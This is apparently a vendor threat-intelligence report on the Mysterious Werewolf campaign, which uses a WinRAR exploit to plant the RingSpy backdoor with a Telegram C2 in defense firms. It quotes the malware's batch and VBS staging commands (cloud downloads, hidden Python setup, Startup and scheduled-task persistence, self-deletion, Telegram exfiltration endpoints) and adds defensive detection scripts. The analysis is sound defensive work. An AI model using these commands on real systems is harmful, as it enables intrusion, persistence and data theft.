Mysterious Werewolf hits defense industry with new RingSpy backdoor
The BI.ZONE Threat Intelligence team has detected a new campaign by Mysterious Werewolf, a cluster that has been active since at least 2023. This time, the adversaries are targeting defense enterprises. To achieve their goals, they use phishing emails with an archive attached. The archive contains a legitimate PDF document and a malicious CMD file. Once the document is extracted and double‑clicked, the exploit launches the CMD file to deliver the RingSpy backdoor to the compromised system. This malware has replaced the Athena agent (Mythic C2 framework) utilized by Mysterious Werewolf in its previous attacks.
- Mysterious Werewolf continues to use phishing emails and CVE‑2023‑38831 in WinRAR to run malicious code in target systems.
- The threat actors are experimenting with malicious payloads. This time they have opted for RingSpy, a Python backdoor, to replace the Athena agent (Mythic C2 framework).
- As before, the cluster abuses legitimate services to communicate with compromised systems: this time, the criminals have turned a Telegram bot into their command‑and‑control server.
The victim presumably receives an email with an archive that enables the criminals to exploit CVE‑2023‑38831. Opening the legitimate file in the archive launches a malicious script (e.g., `O_predostavlenii_kopii_licenzii.pdf .cmd`) that:
- creates a `.vbs` file in the folder `C:\Users\[user]\AppData\Local` and writes into it a script that runs the file whose name is passed as an argument
- creates a `1.bat` file in the folder `C:\Users\[user]\AppData\Local` and launches it with the command `call "%localappdata%\.vbs" "%localappdata%\1.bat"`
- self‑deletes after the launch: `(goto) 2>nul & del "%~f0"`
Running `1.bat` makes it possible to:
- obtain the download link for the next stage of the intrusion and save it in the `r` file in the folder `C:\Users\[user]\AppData\Local`:
```batch
curl -o "C:\Users\[redacted]\AppData\Local\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
```
- download the file via the previously obtained link:
```batch
set /p B=<"C:\Users\[redacted]\AppData\Local\r"
curl -o "C:\Users\[redacted]\AppData\Local\i.bat" -L -O -X GET "%B:~9,445%" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
```
- delete the file with the download link: `del /s /q "C:\Users\thesage\AppData\Local\r"`
- run the downloaded file with the help of `.vbs`: `call C:\Users\[redacted]\AppData\Local\.vbs C:\Users\[redacted]\AppData\Local\i.bat`
- self-delete after the launch: `(goto) 2>nul & del "%~f0"`
Running the `i.bat` script makes it possible to:
- prevent repeat installation by checking for the presence of the file `C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Caches\cversions.db`; if it is missing, the file is created and execution continues:
```batch
if exist "%localappdata%\Microsoft\Windows\Caches\cversions.db" (
exit 0
)
echo. > "%localappdata%\Microsoft\Windows\Caches\cversions.db"
```
- obtain the download address; download, open, and delete the decoy document (see the screenshot below), and delete the file with the download link:
```batch
curl -s -o "%PDF_FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=file.pdf" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
set /p B=<"%PDF_FOLDER%\r"
curl -s -o "%PDF_FOLDER%\O predostavlenii licens.pdf" -L -O -X GET "%B:~9,443%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
start "" "%PDF_FOLDER%\O predostavlenii licens.pdf"
del /s /q "%PDF_FOLDER%\r"
```
[Screenshot: decoy document]
- download the Python interpreter from the official website, unpack it to the folder `C:\Users\[redacted]\AppData\Local\Python`, and finally delete the archive:
```batch
curl -s -o %localappdata%\python.zip -L -O "https://www.python.org/ftp/python/%PYTHON_VERSION_FIRST_TWO_PARTS%.4/python-%PYTHON_VERSION_FIRST_TWO_PARTS%.4-embed-amd64.zip"
if exist "%FOLDER%" (
rmdir /s /q "%FOLDER%"
mkdir "%FOLDER%"
) else (
mkdir "%FOLDER%"
)
tar -xf %localappdata%\python.zip -C "%FOLDER%"
del /s /q %localappdata%\python.zip
```
The variables used are:
```batch
FOLDER=%localappdata%\Python
PYTHON_VERSION_FIRST_TWO_PARTS=3.11
PYTHON_VERSION_FIRST_TWO_PARTS_WITHOUT_POINT=311
```
- assign the hidden attribute to the folder `C:\Users\[redacted]\AppData\Local\Python`: `attrib +h "%FOLDER%" /s /d`
- create the file `C:\Users\[redacted]\AppData\Local\python311._pth` with the following content:
```
Lib/site-packages
python.zip
.
# Uncomment to run site.main() automatically
import site
```
- obtain and launch the pip installer to download additional packages:
```batch
(cd "%FOLDER%" && curl -s -o get-pip.py https://bootstrap.pypa.io/get-pip.py && python get-pip.py)
call python -m pip install requests
call python -m pip install schedule
del /s /q get-pip.py
```
- save the configuration for connecting RingSpy to a Telegram bot in the file `C:\Users\[redacted]\AppData\Local\microsoft\windows\cloudstore\cloud`
- download RingSpy’s Python script via the Yandex Cloud API:
```batch
curl -s -o "%FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=f" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
set /p B=<"%FOLDER%\r"
echo "%B:~9,426%"
curl -s -o "%FOLDER%\f.py" -L -O -X GET "%B:~9,426%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
del /s /q "%FOLDER%\r"
```
- where the `.vbs` file exists in the folder `C:\Users\[user]\AppData\Local`, delete it
- create the `python.vbs` file in the folder `C:\Users\[redacted]\AppData\Local\Python` with the following content:
```vbscript
Set oShell = CreateObject("Wscript.Shell")
oShell.Run "C:\Users\[redacted]\AppData\Local\Python\python.exe" "C:\Users\[redacted]\AppData\Local\Python\f.py", 0, true
```
- copy the created file to the startup folder: `copy "%localappdata%\Python\python.vbs" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"`
- execute the created file: `call "%localappdata%\Python\python.vbs"`
- run the downloaded backdoor file and self-delete, even if the `.vbs` file is missing: `(goto) 2>nul & start /b python "%FOLDER%\f.py" -f "d" & del "%~f0"`
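The staging chain above leaves a characteristic trail in process-creation telemetry: `curl` pulling from the Yandex Disk API with an `OAuth` header, the embeddable Python being fetched and unpacked under `%localappdata%\Python`, that folder being hidden, `pip` running from `cmd.exe`, and `f.py` starting with `-f`. The following Python script is an added example, not BI.ZONE's code or the cluster's scripts: it evaluates constructed Sysmon-style event records against rules derived from the commands quoted in this report and only alerts when several distinct stages are seen on one host. The event records, the user name `victim`, the token placeholder, the rule names and the alerting threshold are all assumptions made for the example.

```python
"""Rule-based triage of process-creation events for the staging chain above.
Added, constructed example (not BI.ZONE's code). Event records mimic the image,
parent image and command-line fields of Sysmon event ID 1 / EDR telemetry;
the user name 'victim' and TOKEN_PLACEHOLDER are made up."""
import re

# (rule name, pattern over the command line, required parent image or None).
# cmd.exe expands %localappdata% before a child process starts, so telemetry
# shows the literal path and the patterns look for AppData\Local\Python rather
# than the variable. Patterns follow the commands quoted in the report.
RULES = [
    ("yandex_disk_download_via_curl",
     re.compile(r'cloud-api\.yandex\.net/v1/disk/resources/download', re.I), "cmd.exe"),
    ("oauth_header_on_cli",
     re.compile(r'Authorization:\s*OAuth\s', re.I), None),
    ("embeddable_python_download",
     re.compile(r'python\.org/ftp/python/.*-embed-amd64\.zip', re.I), None),
    ("python_zip_unpacked_to_localappdata",
     re.compile(r'tar\s+-xf\s+.*python\.zip\s+-C\s+"?.*AppData\\Local\\Python', re.I), None),
    ("hidden_attribute_on_python_dir",
     re.compile(r'attrib\s+\+h\s+"?.*AppData\\Local\\Python', re.I), None),
    ("pip_install_from_cmd",
     re.compile(r'python\s+-m\s+pip\s+install\s+(requests|schedule)\b', re.I), "cmd.exe"),
    ("ringspy_launch_with_f_flag",
     re.compile(r'python(\.exe)?\s+"?.*AppData\\Local\\Python\\f\.py"?\s+-f(\s|$)', re.I), None),
]


def match_event(event):
    """Return the names of all rules that a single event satisfies."""
    hits = []
    for name, pattern, parent in RULES:
        if parent is not None and event.get("parent", "").lower() != parent:
            continue
        if pattern.search(event["cmdline"]):
            hits.append(name)
    return hits


def triage_host(events, min_rules=3):
    """Aggregate hits over one host's events. A single rule can fire on benign
    activity (pip from cmd.exe, tar of a zip); several distinct stages of the
    chain seen together justify an alert, so at least `min_rules` distinct
    rules must have matched."""
    seen = set()
    for event in events:
        seen.update(match_event(event))
    return sorted(seen), len(seen) >= min_rules


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"image": r"C:\Windows\System32\curl.exe", "parent": "cmd.exe",
     "cmdline": r'curl -o "C:\Users\victim\AppData\Local\r" -L -O -X GET '
                r'"https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" '
                r'-H "Accept: application/json" -H "Authorization: OAuth TOKEN_PLACEHOLDER" '
                r'-H "Content-Type: application/json"'},
    {"image": r"C:\Windows\System32\curl.exe", "parent": "cmd.exe",
     "cmdline": r'curl -s -o C:\Users\victim\AppData\Local\python.zip -L -O '
                r'"https://www.python.org/ftp/python/3.11.4/python-3.11.4-embed-amd64.zip"'},
    {"image": r"C:\Windows\System32\tar.exe", "parent": "cmd.exe",
     "cmdline": r'tar -xf C:\Users\victim\AppData\Local\python.zip -C "C:\Users\victim\AppData\Local\Python"'},
    {"image": r"C:\Windows\System32\attrib.exe", "parent": "cmd.exe",
     "cmdline": r'attrib +h "C:\Users\victim\AppData\Local\Python" /s /d'},
    {"image": r"C:\Users\victim\AppData\Local\Python\python.exe", "parent": "cmd.exe",
     "cmdline": "python -m pip install schedule"},
    {"image": r"C:\Users\victim\AppData\Local\Python\python.exe", "parent": "cmd.exe",
     "cmdline": r'python "C:\Users\victim\AppData\Local\Python\f.py" -f "d"'},
    # Benign look-alike: a developer installing a package from PowerShell.
    {"image": r"C:\Python311\python.exe", "parent": "powershell.exe",
     "cmdline": "python -m pip install requests"},
]

if __name__ == "__main__":
    rules, alert = triage_host(SAMPLE_EVENTS)
    print("rules hit:", ", ".join(rules))
    print("alert:", alert)
```

The parent-image constraint on the `curl` and `pip` rules is what keeps the developer's PowerShell `pip install` out of the result set; the aggregation across a host's events is what turns individually weak matches into a usable alert.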
The RingSpy backdoor enables an adversary to remotely execute commands, obtain their results, and download files from network resources. With the `-f` launch option enabled, RingSpy creates a scheduled task to run the `python.vbs` script every minute:
```batch
powershell.exe schtasks /create /tn 'GoogleUpdatess' /tr '{local}\\Python\\python.vbs' /sc minute /mo 1
```
The backdoor’s C2 server is a Telegram bot. When commands are successfully executed, their output is written to the file `C:\Users\[redacted]\AppData\Local\Python\rs.txt`, which is then sent as a file to the C2 server.
Downloading a file from the specified network location is done with the following PowerShell command:
```powershell
powershell.exe Invoke-WebRequest -Uri "http://[network resource]/[file name]" -OutFile " C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Ringtones\[file name]"
```
Files are sent to the C2 server via `https://api.telegram.org/bot[bot token]/sendDocument`, while text is transferred through `https://api.telegram.org/bot[bot token]/sendMessage`.
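The persistence and C2 traits just described (a one-minute scheduled task launching `python.vbs`, `python.vbs` in the Startup folder, and uploads to the Telegram Bot API `sendDocument` and `sendMessage` endpoints) can each be checked from data a responder already collects. The Python script below is an added example, not BI.ZONE's code: it runs those checks over constructed scheduled-task records, a Startup-folder listing, and proxy log lines. The record fields, the proxy-line format, the user name `victim` and the token `EXAMPLETOKEN` are all assumptions made for the example; the task name, the script path and the Bot API endpoints come from the report.

```python
"""Host and egress checks for RingSpy persistence and C2 as described above.
Added, constructed example (not BI.ZONE's code). Task records, the Startup
listing, proxy lines, the user name 'victim' and EXAMPLETOKEN are made up."""
import re
from urllib.parse import urlsplit

TASK_NAME_FROM_REPORT = "GoogleUpdatess"
# Bot API paths look like /bot<token>/<method>; only the two methods named in
# the report are flagged here.
TELEGRAM_BOT_METHOD = re.compile(r"^/bot([^/]+)/(sendDocument|sendMessage)$")


def check_scheduled_tasks(tasks):
    """Each task is a dict with the fields one would pull from
    `schtasks /query /fo csv /v` (name, action, repeat interval). A task is
    reported when at least two of three traits match: the name quoted in the
    report, an action that runs python.vbs from a Python folder under the user
    profile, and a one-minute repeat."""
    findings = []
    for task in tasks:
        action = task["action"].lower()
        reasons = []
        if task["name"] == TASK_NAME_FROM_REPORT:
            reasons.append("task name quoted in the report")
        if action.endswith("python.vbs") and "\\python\\" in action:
            reasons.append("runs python.vbs from a user-profile Python folder")
        if task.get("interval_minutes") == 1:
            reasons.append("repeats every minute")
        if len(reasons) >= 2:
            findings.append((task["name"], reasons))
    return findings


def check_startup_folder(entries):
    """Flag python.vbs in a Startup-folder listing."""
    return [e for e in entries if e.lower().endswith("\\python.vbs")]


def check_proxy_log(lines):
    """Parse constructed proxy lines `<timestamp> <process> <method> <url>` and
    flag requests to the Telegram Bot API upload/message endpoints. The bot
    token sits in the URL path, so it is masked in the finding; an analyst who
    needs it still has the raw log."""
    findings = []
    for line in lines:
        timestamp, process, method, url = line.split(" ", 3)
        parts = urlsplit(url)
        match = TELEGRAM_BOT_METHOD.match(parts.path)
        if parts.hostname == "api.telegram.org" and match:
            findings.append({
                "timestamp": timestamp,
                "process": process,
                "method": method,
                "endpoint": match.group(2),
                "url": url.replace(match.group(1), "[bot token]"),
            })
    return findings


SAMPLE_TASKS = [  # constructed
    {"name": "GoogleUpdatess",
     "action": r"C:\Users\victim\AppData\Local\Python\python.vbs",
     "interval_minutes": 1},
    {"name": "GoogleUpdateTaskMachineUA",
     "action": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua",
     "interval_minutes": 60},
]
SAMPLE_STARTUP = [  # constructed
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\python.vbs",
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini",
]
SAMPLE_PROXY = [  # constructed
    "2024-01-01T10:00:01Z python.exe POST https://api.telegram.org/botEXAMPLETOKEN/sendDocument",
    "2024-01-01T10:00:02Z python.exe POST https://api.telegram.org/botEXAMPLETOKEN/sendMessage",
    "2024-01-01T10:00:05Z chrome.exe GET https://web.telegram.org/a/",
]

if __name__ == "__main__":
    print(check_scheduled_tasks(SAMPLE_TASKS))
    print(check_startup_folder(SAMPLE_STARTUP))
    for finding in check_proxy_log(SAMPLE_PROXY):
        print(finding)
```

Requiring two of the three task traits means a renamed task or a changed interval still surfaces as long as the action still points at `python.vbs` under the user profile, while the legitimate Google Update task in the sample is left alone.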
Indicators of compromise:
- MD5: 5183844b5e67e204efa4b44e12fa8f4e
- SHA1: 76b0c05bf735fc5e792041842c4b486a9bf750d1
- SHA256: 9eb3d53f505fd8b6ddd9457bf829f549c922c9f77325dd9ad82e6d99589be1fa
Tactic | Technique | Procedure |
---|---|---|
Initial Access | Phishing: Spearphishing Attachment | Uses phishing emails to gain initial access |
Execution | Command and Scripting Interpreter: PowerShell | Uses PowerShell to run commands and scripts |
Execution | Command and Scripting Interpreter: Windows Command Shell | Uses the Windows command line to run commands and scripts |
Execution | Command and Scripting Interpreter: Visual Basic | Uses VBScripts |
Execution | Command and Scripting Interpreter: Python | Uses the Python interpreter to execute the backdoor code |
Execution | Exploitation for Client Execution | Exploits the CVE-2023-38831 vulnerability in WinRAR to execute malicious code |
Persistence | Scheduled Task/Job: Scheduled Task | Creates jobs in Windows Task Scheduler to gain a foothold in the compromised system |
Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Uses the startup folder to gain a foothold in the compromised system |
Defense Evasion | Indicator Removal: File Deletion | Deletes files after execution |
Command and Control | Ingress Tool Transfer | Downloads files from remote resources |
Command and Control | Web Service: Bidirectional Communication | Uses a Telegram bot as a C2 server |
More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.
The Mysterious Werewolf cluster continues to develop its attack methods. This time, the threat actors focus on the critical infrastructure of the defense industry. To communicate with the compromised systems, they resort to legitimate services more frequently than before. This once again proves the need for effective endpoint protection and round‑the‑clock monitoring, for example, as part of the BI.ZONE TDR service. Meanwhile, with real-time insights from the BI.ZONE Threat Intelligence platform, you can stay updated on the new methods employed at early attack stages and improve the effectiveness of your security solutions.